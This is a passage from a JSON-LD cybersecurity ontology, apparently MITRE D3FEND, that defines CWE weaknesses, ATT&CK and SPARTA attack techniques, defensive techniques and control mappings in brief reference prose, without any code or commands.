      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1177",
      "d3f:definition": "The product uses a function, library, or third party component that has been explicitly prohibited, whether by the developer or the customer.",
      "rdfs:label": "Use of Prohibited Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:T1562.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1562.004",
      "d3f:definition": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.",
      "d3f:modifies": {
        "@id": "d3f:SystemFirewallConfiguration"
      },
      "rdfs:label": "Disable or Modify System Firewall",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1562"
        },
        {
          "@id": "_:N2693cb4a4e7544aca543ef788c99f131"
        }
      ]
    },
    {
      "@id": "_:N2693cb4a4e7544aca543ef788c99f131",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemFirewallConfiguration"
      }
    },
    {
      "@id": "d3f:Vulnerability",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A Vulnerability is a publicly disclosed instance of one or more weaknesses in a product that an attacker could exploit, violating its confidentiality, integrity, or availability.",
      "rdfs:label": "Vulnerability",
      "rdfs:subClassOf": {
        "@id": "d3f:D3FENDCore"
      }
    },
    {
      "@id": "d3f:CWE-1063",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1063",
      "d3f:definition": "A static code block creates an instance of a class.",
      "rdfs:label": "Creation of Class Instance within a Static Code Block",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1176"
      }
    },
    {
      "@id": "d3f:ArchiveFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An archive file is a file that is composed of one or more computer files along with metadata. Archive files are used to collect multiple data files together into a single file for easier portability and storage, or simply to compress files to use less storage space. Archive files often store directory structures, error detection and correction information, arbitrary comments, and sometimes use built-in encryption.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Archive_file"
      },
      "rdfs:label": "Archive File",
      "rdfs:subClassOf": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:IntervalEstimation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-IE",
      "d3f:definition": "Interval estimation is the use of sample data to estimate an interval of possible values of a parameter of interest.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Interval estimation. [Link](https://en.wikipedia.org/wiki/Interval_estimation)",
      "rdfs:label": "Interval Estimation",
      "rdfs:subClassOf": {
        "@id": "d3f:Estimation"
      }
    },
    {
      "@id": "d3f:WindowsNtSetThreadContext",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Windows NtSetThreadContext",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPISetThreadContext"
      }
    },
    {
      "@id": "d3f:DirectoryService",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computing, directory service or name service maps the names of network resources to their respective network addresses. It is a shared information infrastructure for locating, managing, administering and organizing everyday items and network resources, which can include volumes, folders, files, printers, users, groups, devices, telephone numbers and other objects. A directory service is a critical component of a network operating system. A directory server or name server is a server which provides such a service. Each resource on the network is considered an object by the directory server. Information about a particular resource is stored as a collection of attributes associated with that resource or object.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Directory_service"
      },
      "rdfs:label": "Directory Service",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkService"
      }
    },
    {
      "@id": "d3f:LM-0001",
      "@type": "owl:Class",
      "d3f:attack-id": "LM-0001",
      "d3f:definition": "The adversary pivots through the host–payload boundary to reach additional subsystems. Hosted payloads exchange power, time, housekeeping, and data with the bus via defined gateways (e.g., SpaceWire, 1553, Ethernet) and often support file services, table loads, and command dictionaries distinct from the host’s. A foothold on the payload can be used to inject traffic through the gateway processor, request privileged services (time/ephemeris distribution, firmware loads), or ride shared backplanes where payload traffic is bridged into C&DH networks. In some designs, payload processes execute on host compute or expose maintenance modes that temporarily widen access, creating paths from the payload into attitude, power, storage, or recorder resources. The movement is transitive: compromise a co-resident unit, then traverse the trusted interface that already exists for mission operations.",
      "rdfs:label": "Hosted Payload - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/LM-0001/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTALateralMovementTechnique"
      },
      "skos:prefLabel": "Hosted Payload"
    },
    {
      "@id": "d3f:SoftwareUpdate",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SoftwareUpdate"
      ],
      "d3f:d3fend-id": "D3-SU",
      "d3f:definition": "Replacing old software on a computer system component.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-MethodAndSystemForProvidingSoftwareUpdatesToLocalMachines"
      },
      "d3f:updates": {
        "@id": "d3f:Software"
      },
      "rdfs:label": "Software Update",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformHardening"
        },
        {
          "@id": "_:Nfcfdf3802f9c48978141ec0f9b909a06"
        }
      ]
    },
    {
      "@id": "_:Nfcfdf3802f9c48978141ec0f9b909a06",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:updates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "d3f:T1218.013",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1218.013",
      "d3f:definition": "Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject)",
      "d3f:invokes": {
        "@id": "d3f:CreateThread"
      },
      "d3f:modifies": {
        "@id": "d3f:ProcessSegment"
      },
      "rdfs:label": "Mavinject",
      "rdfs:seeAlso": {
        "@id": "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1218"
        },
        {
          "@id": "_:Nfcfa0fe1902a404082e7b888d92466a7"
        },
        {
          "@id": "_:N933940ddcbca4567a6b4650c847b1061"
        }
      ]
    },
    {
      "@id": "_:Nfcfa0fe1902a404082e7b888d92466a7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateThread"
      }
    },
    {
      "@id": "_:N933940ddcbca4567a6b4650c847b1061",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessSegment"
      }
    },
    {
      "@id": "d3f:CWE-426",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-426",
      "d3f:definition": "The product searches for critical resources using an externally-supplied search path that can point to resources that are not under the product's direct control.",
      "d3f:synonym": "Untrusted Path",
      "rdfs:label": "Untrusted Search Path",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-642"
        },
        {
          "@id": "d3f:CWE-673"
        }
      ]
    },
    {
      "@id": "d3f:M1051",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": {
        "@id": "d3f:SoftwareUpdate"
      },
      "rdfs:label": "Update Software"
    },
    {
      "@id": "d3f:DatabaseApplication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A database application is a computer program whose primary purpose is retrieving information from a computerized database.",
      "d3f:synonym": "Database Management System (DBMS)",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Database_application"
      },
      "rdfs:label": "Database Application",
      "rdfs:subClassOf": {
        "@id": "d3f:Application"
      }
    },
    {
      "@id": "d3f:Reference-Remembranceofdatapassed:Astudyofdisksanitizationpractices",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.researchgate.net/profile/Simson-Garfinkel/publication/3437324_Remembrance_of_data_passed_A_study_of_disk_sanitization_practices/links/550de6d40cf2128741677d9f/Remembrance-of-data-passed-A-study-of-disk-sanitization-practices.pdf"
      },
      "d3f:kb-author": "Simson L Garfinkel, Abhi Shelat",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:DiskErasure"
        },
        {
          "@id": "d3f:DiskFormatting"
        },
        {
          "@id": "d3f:DiskPartitioning"
        }
      ],
      "d3f:kb-reference-title": "Remembrance of Data Passed: A Study of Disk Sanitization Practices",
      "rdfs:label": "Reference - Remembrance of data passed: A study of disk sanitization practices"
    },
    {
      "@id": "d3f:InboundInternetMailTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Inbound internet mail traffic is network traffic that is: (a) coming from a host outside a given network via an incoming connection to a host inside that same network, and (b) using a standard protocol for email.",
      "rdfs:label": "Inbound Internet Mail Traffic",
      "rdfs:seeAlso": {
        "@id": "dbr:Internetworking"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:InboundInternetNetworkTraffic"
        },
        {
          "@id": "d3f:InboundNetworkTraffic"
        },
        {
          "@id": "d3f:MailNetworkTraffic"
        }
      ]
    },
    {
      "@id": "d3f:available",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "Date that the resource became or will become available.",
      "rdfs:label": {
        "@language": "en",
        "@value": "date available"
      },
      "rdfs:range": {
        "@id": "xsd:dateTime"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:date"
      }
    },
    {
      "@id": "d3f:DecoderApplication",
      "@type": "owl:Class",
      "d3f:definition": "An application that decodes digital data.",
      "rdfs:label": "Decoder Application",
      "rdfs:subClassOf": {
        "@id": "d3f:CodecApplication"
      }
    },
    {
      "@id": "d3f:Server",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computing, a server is a piece of computer hardware or software (computer program) that provides functionality for other programs or devices, called \"clients\". This architecture is called the client-server model. Servers can provide various functionalities, often called \"services\", such as sharing data or resources among multiple clients, or performing computation for a client. A single server can serve multiple clients, and a single client can use multiple servers. A client process may run on the same device or may connect over a network to a server on a different device. Typical servers are database servers, file servers, mail servers, print servers, web servers, game servers, and application servers.",
      "d3f:manages": {
        "@id": "d3f:ServiceApplicationProcess"
      },
      "d3f:runs": {
        "@id": "d3f:ServiceApplication"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Server_(computing)"
      },
      "rdfs:label": "Server",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Host"
        },
        {
          "@id": "_:Nc44d7bc30031478d8c1631a9bae99229"
        },
        {
          "@id": "_:N6c1a03e974734bd1af1a6b9417aad2b7"
        }
      ]
    },
    {
      "@id": "_:Nc44d7bc30031478d8c1631a9bae99229",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:manages"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ServiceApplicationProcess"
      }
    },
    {
      "@id": "_:N6c1a03e974734bd1af1a6b9417aad2b7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:runs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ServiceApplication"
      }
    },
    {
      "@id": "d3f:T1161",
      "@type": "owl:Class",
      "d3f:attack-id": "T1161",
      "d3f:definition": "Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long adjustments are made to the rest of the fields and dependencies (Citation: Writing Bad Malware for OSX). There are tools available to perform these changes. Any changes will invalidate digital signatures on binaries because the binary is being modified. Adversaries can remediate this issue by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time (Citation: Malware Persistence on OS X).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1546.006",
      "rdfs:label": "LC_LOAD_DYLIB Addition",
      "rdfs:seeAlso": {
        "@id": "d3f:T1546.006"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:CWE-610",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-610",
      "d3f:definition": "The product uses an externally controlled name or reference that resolves to a resource that is outside of the intended control sphere.",
      "rdfs:label": "Externally Controlled Reference to a Resource in Another Sphere",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:OTTransportConfigurationCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Configure transport settings for a communication channel.",
      "rdfs:label": "OT Transport Configuration Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTNetworkManagementCommandEvent"
        },
        {
          "@id": "_:Nb5b91c4ac182442c8538ab9ddc60b200"
        }
      ]
    },
    {
      "@id": "_:Nb5b91c4ac182442c8538ab9ddc60b200",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTTransportConfigurationCommand"
      }
    },
    {
      "@id": "d3f:T1584.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1584.004",
      "d3f:definition": "Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control.(Citation: TrendMicro EarthLusca 2022) Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.",
      "rdfs:label": "Server",
      "rdfs:subClassOf": {
        "@id": "d3f:T1584"
      }
    },
    {
      "@id": "d3f:T1131",
      "@type": "owl:Class",
      "d3f:attack-id": "T1131",
      "d3f:definition": "Windows Authentication Package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1547.002",
      "rdfs:label": "Authentication Package",
      "rdfs:seeAlso": {
        "@id": "d3f:T1547.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:CCI-002531_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:Hardware-basedProcessIsolation"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements underlying hardware separation mechanisms to facilitate process separation.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002531"
    },
    {
      "@id": "d3f:FileGetAttributesEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a file's metadata attributes, such as size, creation date, or type, are queried or retrieved without altering its content.",
      "rdfs:label": "File Get Attributes Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileEvent"
        },
        {
          "@id": "_:N1e9d7e7e47ae49dc9a49b53a09694753"
        },
        {
          "@id": "_:Necb51c40082b449b9f31f395ebfeadba"
        }
      ]
    },
    {
      "@id": "_:N1e9d7e7e47ae49dc9a49b53a09694753",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileAccessEvent"
      }
    },
    {
      "@id": "_:Necb51c40082b449b9f31f395ebfeadba",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileCreationEvent"
      }
    },
    {
      "@id": "d3f:CWE-36",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-36",
      "d3f:definition": "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize absolute path sequences such as \"/abs/path\" that can resolve to a location that is outside of that directory.",
      "rdfs:label": "Absolute Path Traversal",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-22"
      }
    },
    {
      "@id": "d3f:CWE-120",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-120",
      "d3f:definition": "The product copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer, leading to a buffer overflow.",
      "d3f:synonym": [
        "Classic Buffer Overflow",
        "Unbounded Transfer"
      ],
      "rdfs:label": "Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-119"
        },
        {
          "@id": "d3f:CWE-787"
        }
      ]
    },
    {
      "@id": "d3f:identified-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x identified-by y: The entity x is recognized or described by entity y.",
      "owl:inverseOf": {
        "@id": "d3f:identifies"
      },
      "rdfs:label": "identified-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:T1014",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1014",
      "d3f:definition": "Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits)",
      "d3f:may-modify": [
        {
          "@id": "d3f:BootSector"
        },
        {
          "@id": "d3f:Firmware"
        },
        {
          "@id": "d3f:Kernel"
        },
        {
          "@id": "d3f:KernelModule"
        },
        {
          "@id": "d3f:SharedLibraryFile"
        }
      ],
      "rdfs:label": "Rootkit",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "_:N85970401bf1443ca829efb3638aac9ae"
        },
        {
          "@id": "_:Na6a0885a36f64955abd472cbbca47957"
        },
        {
          "@id": "_:N47b8954a10254145b9faf0dfe09b4d16"
        },
        {
          "@id": "_:Nb330abb774464939a39020970121a466"
        },
        {
          "@id": "_:N0bef1d13270c46a897d56b3f4de67da0"
        }
      ]
    },
    {
      "@id": "_:N85970401bf1443ca829efb3638aac9ae",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BootSector"
      }
    },
    {
      "@id": "_:Na6a0885a36f64955abd472cbbca47957",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Firmware"
      }
    },
    {
      "@id": "_:N47b8954a10254145b9faf0dfe09b4d16",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Kernel"
      }
    },
    {
      "@id": "_:Nb330abb774464939a39020970121a466",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KernelModule"
      }
    },
    {
      "@id": "_:N0bef1d13270c46a897d56b3f4de67da0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_19",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Validation of Metadata",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(19)"
    },
    {
      "@id": "d3f:MemoryAddressSpace",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:MemoryAddress"
      },
      "d3f:definition": "A memory address space is a space containing memory addresses.",
      "rdfs:label": "Memory Address Space",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AddressSpace"
        },
        {
          "@id": "_:N48217cb8f6fb4608b86c7b3ca7d723af"
        }
      ]
    },
    {
      "@id": "_:N48217cb8f6fb4608b86c7b3ca7d723af",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryAddress"
      }
    },
    {
      "@id": "d3f:MultilayerPerceptronClassification",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-MPC",
      "d3f:definition": "A multilayer perceptron (MLP) is a fully connected class of feedforward artificial neural network (ANN).An MLP consists of at least three layers of nodes: an input layer, a hidden layer and an output layer.",
      "d3f:kb-article": "## References\nMultilayer perceptron. Wikipedia. [Link](https://en.wikipedia.org/wiki/Multilayer_perceptron).",
      "rdfs:label": "Multilayer Perceptron Classification",
      "rdfs:subClassOf": {
        "@id": "d3f:ArtificialNeuralNetClassification"
      }
    },
    {
      "@id": "d3f:ATTACKMobileLateralMovementTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0033"
      },
      "rdfs:label": "Lateral Movement Technique - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTechnique"
        },
        {
          "@id": "_:Ned5a6195858644ac84a5f15497799252"
        }
      ],
      "skos:prefLabel": "Lateral Movement Technique"
    },
    {
      "@id": "_:Ned5a6195858644ac84a5f15497799252",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0033"
      }
    },
    {
      "@id": "d3f:CWE-758",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-758",
      "d3f:definition": "The product uses an API function, data structure, or other entity in a way that relies on properties that are not always guaranteed to hold for that entity.",
      "rdfs:label": "Reliance on Undefined, Unspecified, or Implementation-Defined Behavior",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:CWE-130",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-130",
      "d3f:definition": "The product parses a formatted message or structure, but it does not handle or incorrectly handles a length field that is inconsistent with the actual length of the associated data.",
      "d3f:synonym": [
        "length manipulation",
        "length tampering"
      ],
      "rdfs:label": "Improper Handling of Length Parameter Inconsistency",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-240"
      }
    },
    {
      "@id": "d3f:Reference-NullPointerChecking_SEI",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://wiki.sei.cmu.edu/confluence/display/c/EXP34-C.+Do+not+dereference+null+pointers"
      },
      "d3f:kb-organization": "Software Engineering Institute",
      "d3f:kb-reference-of": {
        "@id": "d3f:NullPointerChecking"
      },
      "d3f:kb-reference-title": "SEI CERT C Coding Standard",
      "rdfs:label": "Reference - Null Pointer Checking - SEI"
    },
    {
      "@id": "d3f:NetworkVulnerabilityAssessment",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:NetworkVulnerabilityAssessment"
      ],
      "d3f:d3fend-id": "D3-NVA",
      "d3f:definition": "Network vulnerability assessment relates all the vulnerabilities of a network's components in the context of their configuration and interdependencies and can also include assessing risk emerging from the network's design as a whole, not just the sum of individual network node or network segment vulnerabilities.",
      "d3f:evaluates": {
        "@id": "d3f:Network"
      },
      "d3f:identifies": {
        "@id": "d3f:Vulnerability"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-ReachabilityGraphBasedSafeRemediationsforSecuirytofOnPremiseAndCloudComputingEnvironments"
      },
      "rdfs:label": "Network Vulnerability Assessment",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkMapping"
        },
        {
          "@id": "_:N641cf5f9f9814416a22b27f3cf2587e0"
        },
        {
          "@id": "_:Nc63e4dc62b1449d08a31e2e6c95c71e9"
        }
      ]
    },
    {
      "@id": "_:N641cf5f9f9814416a22b27f3cf2587e0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:evaluates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Network"
      }
    },
    {
      "@id": "_:Nc63e4dc62b1449d08a31e2e6c95c71e9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:identifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Vulnerability"
      }
    },
    {
      "@id": "d3f:Software-definedRadioComputer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:Software-definedRadio"
      },
      "d3f:definition": "An embedded computer that includes a self-contained radio system, onboard compute (e.g., SoC/CPU/DSP/FPGA), and software/firmware sufficient to run waveforms and manage RF functions without requiring a continuously attached host PC. It typically exposes control and data via network or other external interfaces and may run an embedded OS.",
      "d3f:may-run": {
        "@id": "d3f:Real-timeOperatingSystem"
      },
      "d3f:runs": {
        "@id": "d3f:Software-definedRadioWaveformApplication"
      },
      "d3f:synonym": "Standalone SDR",
      "rdfs:label": "Software-Defined Radio Computer",
      "rdfs:seeAlso": {
        "@id": "https://satsearch.co/products/alenspace-totem-software-defined-radio-sdr"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTEmbeddedComputer"
        },
        {
          "@id": "_:N35f71f1626bb471e82fdb281f8e0e5f8"
        },
        {
          "@id": "_:Nb7ce1e631c414f939659bf66ba00fb01"
        },
        {
          "@id": "_:N19ed2d99539243eea35c7a1eaa027b51"
        }
      ]
    },
    {
      "@id": "_:N35f71f1626bb471e82fdb281f8e0e5f8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software-definedRadio"
      }
    },
    {
      "@id": "_:Nb7ce1e631c414f939659bf66ba00fb01",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-run"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Real-timeOperatingSystem"
      }
    },
    {
      "@id": "_:N19ed2d99539243eea35c7a1eaa027b51",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:runs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software-definedRadioWaveformApplication"
      }
    },
    {
      "@id": "d3f:may-contain",
      "@type": [
        "owl:ObjectProperty",
        "owl:TransitiveProperty"
      ],
      "d3f:definition": "to potentially have as contents or constituent parts; comprise; include.",
      "rdfs:label": "may-contain",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:SMBFileOverwriteIfEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a file is opened and truncated if it exists, or created otherwise. This operation combines destructive overwrite and creation behaviors.",
      "rdfs:label": "SMB File Overwrite If Event",
      "rdfs:subClassOf": {
        "@id": "d3f:SMBEvent"
      }
    },
    {
      "@id": "d3f:may-be-evicted-by",
      "@type": "owl:ObjectProperty",
      "d3f:pref-label": "may be evicted by",
      "owl:inverseOf": {
        "@id": "d3f:may-evict"
      },
      "rdfs:label": "may-be-evicted-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:attack-may-be-countered-by"
      }
    },
    {
      "@id": "d3f:LM-0003",
      "@type": "owl:Class",
      "d3f:attack-id": "LM-0003",
      "d3f:definition": "In networks where vehicles exchange data over inter-satellite links, a compromise on one spacecraft becomes a springboard to others. The attacker crafts crosslink traffic, routing updates, service advertisements, time/ephemeris distribution, file or tasking messages, that appears to originate from a trusted neighbor and targets gateway functions that bridge crosslink traffic into command/data paths. Once accepted, those messages can queue procedures, deliver configuration/table edits, or open file transfer sessions on adjacent vehicles. In mesh or hub-and-spoke constellations, this enables “hop-by-hop” spread: a single foothold uses shared trust and protocol uniformity to reach additional satellites without contacting the ground segment.",
      "rdfs:label": "Constellation Hopping via Crosslink - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/LM-0003/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTALateralMovementTechnique"
      },
      "skos:prefLabel": "Constellation Hopping via Crosslink"
    },
    {
      "@id": "d3f:EventLogRestartEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the restarting of the event logging service, often performed during system maintenance or troubleshooting.",
      "rdfs:label": "Event Log Restart Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EventLogEvent"
        },
        {
          "@id": "_:N2d518f369ed74f9fbaaee66c767b7ed4"
        },
        {
          "@id": "_:N04a39cbfd1d34aaca7ef72661567548e"
        }
      ]
    },
    {
      "@id": "_:N2d518f369ed74f9fbaaee66c767b7ed4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EventLogStopEvent"
      }
    },
    {
      "@id": "_:N04a39cbfd1d34aaca7ef72661567548e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:precedes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EventLogStartEvent"
      }
    },
    {
      "@id": "d3f:RegSetKeyValueA",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SetSystemConfigValue"
      ],
      "rdfs:label": "RegSetKeyValueA"
    },
    {
